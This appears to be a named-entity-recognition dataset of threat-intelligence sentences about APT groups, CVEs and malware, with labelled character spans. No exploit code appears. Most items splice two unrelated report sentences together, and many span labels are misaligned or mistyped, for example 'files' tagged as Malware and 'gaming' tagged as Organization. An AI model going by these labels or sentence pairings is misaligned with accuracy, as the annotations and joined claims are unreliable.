{"text": "LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The Winnti umbrella continues to operate highly successfully in 2018 .", "spans": [{"start": 48, "end": 78, "label": "Vulnerability"}, {"start": 81, "end": 95, "label": "Vulnerability"}, {"start": 104, "end": 110, "label": "Malware"}]}
{"text": "No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" \u2014 a near-year-old Java security hole \u2014 \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The Winnti umbrella and closely associated entities has been active since at least 2009 .", "spans": [{"start": 3, "end": 27, "label": "Vulnerability"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 185, "end": 198, "label": "Vulnerability"}, {"start": 231, "end": 248, "label": "Organization"}, {"start": 276, "end": 282, "label": "Malware"}]}
{"text": "Execute a command through exploits for CVE-2017-11882 . The Winnti and Axiom group names were created by Kaspersky Lab and Symantec , respectively , for their 2013/2014 reports on the original group .", "spans": [{"start": 39, "end": 53, "label": "Vulnerability"}, {"start": 60, "end": 66, "label": "Organization"}, {"start": 105, "end": 118, "label": "Organization"}, {"start": 123, "end": 131, "label": "Organization"}]}
{"text": "Execute a command through exploits for CVE-2018-0802 . Their operations against gaming and technology organizations are believed to be economically motivated in nature .", "spans": [{"start": 39, "end": 52, "label": "Vulnerability"}, {"start": 80, "end": 86, "label": "Organization"}, {"start": 91, "end": 115, "label": "Organization"}]}
{"text": "The document attached to this e-mail exploits CVE-2012-0158 . However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused .", "spans": [{"start": 30, "end": 45, "label": "Vulnerability"}, {"start": 46, "end": 59, "label": "Vulnerability"}]}
{"text": "Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . The Winnti umbrella and linked groups' initial targets are gaming studios and high tech businesses .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 40, "end": 53, "label": "Vulnerability"}, {"start": 88, "end": 94, "label": "Malware"}, {"start": 143, "end": 157, "label": "Organization"}, {"start": 162, "end": 182, "label": "Organization"}]}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 166, "end": 196, "label": "Vulnerability"}, {"start": 388, "end": 401, "label": "Malware"}]}
{"text": "the backdoor is packaged together with the CVE-2013-5065 EoP exploit and heavily obfuscated . In this campaign , the attackers experimented with publicly available tooling for attack operations .", "spans": [{"start": 43, "end": 56, "label": "Vulnerability"}, {"start": 57, "end": 68, "label": "Vulnerability"}, {"start": 145, "end": 171, "label": "Malware"}]}
{"text": "While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July . The primary goal of these attacks was likely to find code-signing certificates for signing future malware .", "spans": [{"start": 89, "end": 102, "label": "Vulnerability"}, {"start": 103, "end": 122, "label": "Vulnerability"}, {"start": 141, "end": 151, "label": "Organization"}]}
{"text": "However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised . The Chinese intelligence apparatus has been reported on under many names , including Winnti , PassCV , APT17 , Axiom , LEAD , Barium , Wicked Panda , and GREF .", "spans": [{"start": 36, "end": 41, "label": "Organization"}, {"start": 50, "end": 67, "label": "Vulnerability"}, {"start": 212, "end": 218, "label": "Malware"}, {"start": 253, "end": 259, "label": "Organization"}]}
{"text": "PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The attackers behind observed activity in 2018 operate from the Xicheng District of Beijing via the net block 221.216.0.0/13 .", "spans": [{"start": 108, "end": 127, "label": "Vulnerability"}, {"start": 130, "end": 143, "label": "Vulnerability"}]}
{"text": "PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security ( DHS ) .", "spans": [{"start": 16, "end": 29, "label": "Vulnerability"}, {"start": 225, "end": 256, "label": "Organization"}, {"start": 259, "end": 262, "label": "Organization"}]}
{"text": "Kaspersky Lab has detected a new method of first infection that uses a drive-by-download with a flash exploit ( CVE-2015-5119 , the one leaked from The Hacking Team incident ) . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 96, "end": 109, "label": "Vulnerability"}, {"start": 112, "end": 125, "label": "Vulnerability"}, {"start": 250, "end": 281, "label": "Organization"}]}
{"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems .", "spans": [{"start": 7, "end": 15, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 97, "end": 110, "label": "Vulnerability"}, {"start": 221, "end": 241, "label": "Malware"}]}
{"text": "Moreover , they used the same exploit kit Niteris as that in the Corkow case . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly ( which Dragos associates with DYMALLOY ) .", "spans": [{"start": 38, "end": 49, "label": "Vulnerability"}, {"start": 65, "end": 71, "label": "System"}, {"start": 99, "end": 102, "label": "Organization"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 204, "end": 213, "label": "Organization"}, {"start": 222, "end": 228, "label": "Organization"}, {"start": 245, "end": 253, "label": "Malware"}]}
{"text": "The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group .", "spans": [{"start": 4, "end": 17, "label": "Vulnerability"}, {"start": 104, "end": 107, "label": "Organization"}]}
{"text": "The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus .", "spans": [{"start": 4, "end": 19, "label": "System"}, {"start": 32, "end": 47, "label": "Vulnerability"}, {"start": 90, "end": 101, "label": "Organization"}, {"start": 105, "end": 115, "label": "Organization"}]}
{"text": "While documents designed to exploit the InPage software are rare , they are not new \u2013 however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities .", "spans": [{"start": 40, "end": 55, "label": "System"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 139, "end": 154, "label": "Vulnerability"}, {"start": 250, "end": 259, "label": "Organization"}]}
{"text": "Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group Symantec calls Dragonfly .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 191, "end": 204, "label": "Vulnerability"}, {"start": 209, "end": 223, "label": "Vulnerability"}, {"start": 246, "end": 249, "label": "Organization"}, {"start": 336, "end": 344, "label": "Organization"}, {"start": 351, "end": 360, "label": "Organization"}]}
{"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 45, "end": 54, "label": "Malware"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 133, "end": 136, "label": "Organization"}]}
{"text": "Confucius' backdoors are delivered through Office documents exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 . ALLANITE conducts malware-less operations primarily leveraging legitimate and available tools in the Windows operating system .", "spans": [{"start": 0, "end": 10, "label": "System"}, {"start": 105, "end": 118, "label": "Vulnerability"}, {"start": 123, "end": 137, "label": "Vulnerability"}, {"start": 241, "end": 248, "label": "System"}]}
{"text": "The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": [{"start": 4, "end": 19, "label": "System"}, {"start": 73, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 95, "label": "Organization"}]}
{"text": "The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . However , full details on ALLANITE and other group tools , techniques , procedures , and infrastructure is available to network defenders via Dragos WorldView .", "spans": [{"start": 27, "end": 40, "label": "Vulnerability"}, {"start": 71, "end": 87, "label": "System"}, {"start": 90, "end": 93, "label": "Malware"}, {"start": 223, "end": 232, "label": "Malware"}, {"start": 377, "end": 393, "label": "Organization"}]}
{"text": "Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors .", "spans": [{"start": 27, "end": 45, "label": "Vulnerability"}, {"start": 67, "end": 79, "label": "Vulnerability"}, {"start": 378, "end": 397, "label": "Organization"}, {"start": 404, "end": 423, "label": "Organization"}]}
{"text": "Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology .", "spans": [{"start": 45, "end": 60, "label": "Vulnerability"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 293, "end": 308, "label": "Organization"}]}
{"text": "In August 2014 , some of our users observed targeted attacks with a variation of CVE-2012-0158 and an unusual set of malware . PLA Navy Anchor Panda is an adversary that CrowdStrike has tracked extensively over the last year targeting both civilian and military maritime operations in the green/brown water regions primarily in the LOC of operations of the South Sea Fleet of the PLA Navy .", "spans": [{"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 136, "end": 148, "label": "Organization"}, {"start": 170, "end": 181, "label": "Organization"}]}
{"text": "Longhorn , which we internally refer to as \" The Lamberts \" , first came to the attention of the ITSec community in 2014 , when our colleagues from FireEye discovered an attack using a zero day vulnerability ( CVE-2014-4148 ) . ALLANITE operations continue and intelligence indicates activity since at least May 2017 .", "spans": [{"start": 45, "end": 57, "label": "Organization"}, {"start": 97, "end": 112, "label": "Organization"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 185, "end": 207, "label": "Vulnerability"}, {"start": 210, "end": 223, "label": "Vulnerability"}]}
{"text": "The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . APT Anchor Panda is a Chinese threat actor group who target maritime operations .", "spans": [{"start": 19, "end": 41, "label": "System"}, {"start": 92, "end": 99, "label": "Organization"}, {"start": 122, "end": 138, "label": "Vulnerability"}, {"start": 141, "end": 154, "label": "Vulnerability"}]}
{"text": "While in most cases the infection vector remains unknown , the high profile attack from 2014 used a very complex Windows TTF zero-day exploit ( CVE-2014-4148 ) . According to cyber security researchers , Anchor Panda , who work directly for the Chinese PLA Navy , likely remains active .", "spans": [{"start": 125, "end": 141, "label": "Vulnerability"}, {"start": 144, "end": 157, "label": "Vulnerability"}]}
{"text": "To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": [{"start": 69, "end": 85, "label": "System"}, {"start": 102, "end": 115, "label": "System"}, {"start": 152, "end": 168, "label": "Vulnerability"}, {"start": 171, "end": 184, "label": "Vulnerability"}, {"start": 187, "end": 193, "label": "Organization"}]}
{"text": "This sample was also found to be deployed using the CVE-2012-0158 vulnerability . In the past they used Adobe Gh0st , Poison Ivy and Torn RAT malware as their primary attack vector is sphere phishing .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 104, "end": 115, "label": "Malware"}, {"start": 118, "end": 128, "label": "Malware"}, {"start": 133, "end": 149, "label": "Malware"}]}
{"text": "Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Their targets are marine companies that operate in and around the South China Sea , an LOC of much Chinese interest .", "spans": [{"start": 52, "end": 65, "label": "Vulnerability"}, {"start": 77, "end": 95, "label": "System"}, {"start": 116, "end": 132, "label": "Organization"}]}
{"text": "Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 31, "end": 42, "label": "System"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 89, "end": 107, "label": "System"}, {"start": 254, "end": 266, "label": "Organization"}]}
{"text": "Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The cyber-espionage campaign has labelled the group Advanced Persistent Threat ( APT ) 40 or , titled , Periscope .", "spans": [{"start": 24, "end": 35, "label": "System"}, {"start": 57, "end": 70, "label": "Vulnerability"}, {"start": 82, "end": 100, "label": "System"}, {"start": 155, "end": 174, "label": "Organization"}, {"start": 175, "end": 192, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}]}
{"text": "In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The group has been active since at least January 2013 .", "spans": [{"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 95, "end": 113, "label": "System"}]}
{"text": "In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states .", "spans": [{"start": 34, "end": 45, "label": "System"}, {"start": 67, "end": 80, "label": "Vulnerability"}, {"start": 96, "end": 114, "label": "System"}, {"start": 145, "end": 155, "label": "Organization"}]}
{"text": "In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The main targets seem to be US companies in engineering , transport and defense , although it has targeted other organizations around the world .", "spans": [{"start": 38, "end": 49, "label": "System"}, {"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 118, "label": "System"}, {"start": 165, "end": 176, "label": "Organization"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 193, "end": 200, "label": "Organization"}]}
{"text": "Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 . The times of day the group is active also suggests that it is based near Beijing and the group has reportedly used malware that has been observed in other Chinese operations , indicating some level of collaboration .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 37, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 137, "label": "Malware"}, {"start": 140, "end": 167, "label": "Malware"}]}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . Periscope 's activity has previously been suspected of being linked to China , but now researchers believe their evidence links the operation to the Chinese state .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}]}
{"text": "Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools .", "spans": [{"start": 21, "end": 31, "label": "Organization"}, {"start": 61, "end": 96, "label": "Vulnerability"}, {"start": 128, "end": 133, "label": "Organization"}, {"start": 287, "end": 311, "label": "Malware"}]}
{"text": "Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit . Anchor Panda uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": [{"start": 111, "end": 116, "label": "Vulnerability"}, {"start": 119, "end": 145, "label": "Vulnerability"}, {"start": 330, "end": 358, "label": "Malware"}]}
{"text": "Adobe Flash Player exploit . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network .", "spans": [{"start": 0, "end": 26, "label": "Vulnerability"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 139, "end": 145, "label": "System"}, {"start": 185, "end": 201, "label": "Malware"}]}
{"text": "It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": [{"start": 25, "end": 34, "label": "Organization"}, {"start": 52, "end": 68, "label": "Vulnerability"}, {"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 295, "end": 323, "label": "Malware"}]}
{"text": "Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors .", "spans": [{"start": 35, "end": 55, "label": "Vulnerability"}, {"start": 58, "end": 71, "label": "Vulnerability"}]}
{"text": "ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . APT5 has been active since at least 2007 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 48, "end": 68, "label": "Vulnerability"}, {"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 130, "end": 134, "label": "Organization"}]}
{"text": "Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications .", "spans": [{"start": 49, "end": 58, "label": "Organization"}, {"start": 92, "end": 109, "label": "Vulnerability"}, {"start": 147, "end": 151, "label": "Organization"}, {"start": 251, "end": 269, "label": "Organization"}, {"start": 274, "end": 294, "label": "Organization"}, {"start": 326, "end": 350, "label": "Organization"}]}
{"text": "This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . APT5 targeted the network of an electronics firm that sells products for both industrial and military applications .", "spans": [{"start": 63, "end": 76, "label": "Vulnerability"}, {"start": 80, "end": 85, "label": "System"}, {"start": 135, "end": 139, "label": "Organization"}, {"start": 167, "end": 183, "label": "Organization"}, {"start": 213, "end": 223, "label": "Organization"}, {"start": 228, "end": 236, "label": "Organization"}]}
{"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks . The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided .", "spans": [{"start": 39, "end": 74, "label": "Vulnerability"}, {"start": 135, "end": 149, "label": "Organization"}, {"start": 211, "end": 219, "label": "Organization"}]}
{"text": "The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . In one case in late 2014 , APT5 breached the network of an international telecommunications company .", "spans": [{"start": 77, "end": 90, "label": "Vulnerability"}, {"start": 181, "end": 221, "label": "Organization"}]}
{"text": "The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies .", "spans": [{"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 257, "end": 285, "label": "Organization"}]}
{"text": "The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . APT5 also targeted the networks of some of Southeast Asia 's major telecommunications providers with Leouncia malware .", "spans": [{"start": 41, "end": 55, "label": "Vulnerability"}, {"start": 231, "end": 259, "label": "Organization"}, {"start": 265, "end": 273, "label": "Malware"}, {"start": 274, "end": 281, "label": "Malware"}]}
{"text": "Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia . We suspect that the group sought access to these networks to obtain information that would enable it to monitor communications passing through the providers' systems .", "spans": [{"start": 28, "end": 50, "label": "Vulnerability"}]}
{"text": "Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak . The FBI said the \" group of malicious cyber actors \" ( known as APT6 or 1.php ) used dedicated top-level domains in conjunction with the command and control servers to deliver \" customized malicious software \" to government computer systems .", "spans": [{"start": 15, "end": 28, "label": "Organization"}, {"start": 94, "end": 102, "label": "Vulnerability"}, {"start": 156, "end": 169, "label": "Organization"}, {"start": 206, "end": 209, "label": "Organization"}, {"start": 266, "end": 270, "label": "Organization"}, {"start": 274, "end": 279, "label": "Indicator"}, {"start": 380, "end": 409, "label": "Malware"}]}
{"text": "Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . Deepen told Threatpost the group has been operating since at least since 2008 and has targeted China and US relations experts , Defense Department entities , and geospatial groups within the federal government .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 26, "end": 35, "label": "Organization"}, {"start": 65, "end": 73, "label": "Vulnerability"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 167, "end": 173, "label": "Organization"}, {"start": 262, "end": 292, "label": "Organization"}, {"start": 295, "end": 313, "label": "Organization"}, {"start": 329, "end": 346, "label": "Organization"}, {"start": 358, "end": 376, "label": "Organization"}]}
{"text": "Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation . Government officials said they knew the initial attack occurred in 2011 , but are unaware of who specifically is behind the attacks .", "spans": [{"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 161, "end": 181, "label": "Organization"}]}
{"text": "Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": [{"start": 82, "end": 90, "label": "Vulnerability"}, {"start": 91, "end": 104, "label": "Vulnerability"}, {"start": 120, "end": 126, "label": "Organization"}, {"start": 129, "end": 133, "label": "Organization"}, {"start": 189, "end": 192, "label": "Malware"}, {"start": 197, "end": 200, "label": "Malware"}, {"start": 277, "end": 285, "label": "Indicator"}]}
{"text": "Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 39, "end": 70, "label": "System"}, {"start": 94, "end": 105, "label": "Organization"}, {"start": 132, "end": 152, "label": "Vulnerability"}]}
{"text": "Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . The attacks discussed in this blog are related to an APT campaign commonly referred to as \" th3bug \" , named for the password the actors often use with their Poison Ivy malware .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 43, "end": 64, "label": "Vulnerability"}, {"start": 266, "end": 284, "label": "Malware"}]}
{"text": "Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b . Over the summer they compromised several sites , including a well-known Uyghur website written in that native language .", "spans": [{"start": 11, "end": 25, "label": "Vulnerability"}, {"start": 95, "end": 108, "label": "Vulnerability"}, {"start": 168, "end": 181, "label": "Organization"}, {"start": 194, "end": 222, "label": "Vulnerability"}]}
{"text": "In that case , we observed Buhtrap using a local privilege escalation exploit , CVE-2019-1132 , against one of its victims . In contrast to many other APT campaigns , which tend to rely heavily on spear phishing to gain victims , \" th3bug \" is known for compromising legitimate websites their intended visitors are likely to frequent .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 80, "end": 93, "label": "Vulnerability"}]}
{"text": "Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . While we were unable to recover the initial vulnerability used , it is possibly the same CVE-2014-0515 Adobe Flash exploit first reported by Cisco TRAC in late July .", "spans": [{"start": 74, "end": 87, "label": "Vulnerability"}, {"start": 177, "end": 187, "label": "Organization"}, {"start": 279, "end": 292, "label": "Vulnerability"}, {"start": 293, "end": 304, "label": "System"}, {"start": 305, "end": 312, "label": "Vulnerability"}, {"start": 331, "end": 341, "label": "Organization"}]}
{"text": "WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . However , to increase success rates APT20 can use zero-day exploits , so even a properly patched system would be compromised .", "spans": [{"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 118, "end": 131, "label": "Vulnerability"}, {"start": 351, "end": 356, "label": "Organization"}, {"start": 365, "end": 373, "label": "Vulnerability"}]}
{"text": "One vulnerability is a Windows zero-day vulnerability (CVE-2019-0703) discovered by Symantec . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers .", "spans": [{"start": 31, "end": 53, "label": "Vulnerability"}, {"start": 84, "end": 92, "label": "Organization"}, {"start": 299, "end": 317, "label": "Organization"}]}
{"text": "Bemstour exploits two Windows vulnerabilities in order to achieve remote kernel code execution on targeted computers . Bahamut was first noticed when it targeted a Middle Eastern human rights activist in the first week of January 2017 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 45, "label": "Vulnerability"}, {"start": 164, "end": 200, "label": "Organization"}]}
{"text": "The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools\u2014EternalRomance and EternalSynergy\u2014that were also released as part of the Shadow Brokers leak . Later that month , the same tactics and patterns were seen in attempts against an Iranian women 's activist \u2013 an individual commonly targeted by Iranian actors , such as Charming Kitten and the Sima campaign documented in our 2016 Black Hat talk .", "spans": [{"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 211, "end": 225, "label": "Organization"}, {"start": 315, "end": 340, "label": "Organization"}, {"start": 346, "end": 356, "label": "Organization"}]}
{"text": "These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": [{"start": 14, "end": 27, "label": "Vulnerability"}, {"start": 70, "end": 83, "label": "Vulnerability"}, {"start": 156, "end": 163, "label": "Organization"}]}
{"text": "Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data .", "spans": [{"start": 54, "end": 68, "label": "Organization"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 171, "end": 176, "label": "Organization"}, {"start": 182, "end": 209, "label": "Malware"}]}
{"text": "The zero-day vulnerability found and reported by Symantec (CVE-2019-0703) occurs due to the way the Windows SMB Server handles certain requests . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably .", "spans": [{"start": 49, "end": 57, "label": "Organization"}, {"start": 58, "end": 73, "label": "Vulnerability"}, {"start": 146, "end": 153, "label": "Organization"}, {"start": 215, "end": 222, "label": "System"}, {"start": 223, "end": 230, "label": "Malware"}]}
{"text": "CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 49, "end": 69, "label": "Malware"}, {"start": 74, "end": 93, "label": "Malware"}, {"start": 221, "end": 228, "label": "Organization"}]}
{"text": "this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . Several times , APT5 has targeted organizations and personnel based in Southeast Asia .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 28, "end": 41, "label": "Vulnerability"}, {"start": 45, "end": 57, "label": "Malware"}, {"start": 76, "end": 80, "label": "Organization"}, {"start": 94, "end": 107, "label": "Organization"}, {"start": 112, "end": 121, "label": "Organization"}]}
{"text": "At this time , we do not believe that the attackers found a new ASA exploit . However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before .", "spans": [{"start": 15, "end": 17, "label": "Organization"}, {"start": 42, "end": 51, "label": "Organization"}, {"start": 64, "end": 67, "label": "Vulnerability"}, {"start": 68, "end": 75, "label": "Vulnerability"}]}
{"text": "We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution (RCE) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 35, "end": 48, "label": "Vulnerability"}]}
